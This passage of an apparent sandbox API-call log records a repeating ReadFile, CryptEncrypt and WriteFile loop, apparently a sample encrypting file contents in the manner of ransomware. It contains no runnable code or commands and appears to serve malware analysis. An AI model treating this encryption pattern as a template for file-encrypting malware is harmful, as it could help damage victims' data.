lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.427] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.427] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.427] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.427] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.427] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.427] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.427] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.427] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.427] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.427] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.427] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.428] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.428] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.428] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.428] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.428] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.428] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.428] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.428] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.428] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.429] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.429] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.429] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.429] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.429] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.429] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.429] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.429] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.429] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.429] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.429] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.429] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.429] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.430] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.430] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.430] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.430] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.430] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.430] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.430] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.430] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.430] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.431] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.431] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.431] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.431] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.431] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.431] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.431] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.431] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.431] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.431] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.431] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.431] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.431] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.431] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.432] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.432] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.432] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.432] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.432] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.432] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.432] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.432] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.432] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.432] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.432] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.432] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.433] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.433] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.433] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.433] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.433] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.433] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.433] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.433] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.433] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.433] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.433] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.433] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.434] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.434] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.434] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.434] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.434] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.434] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, 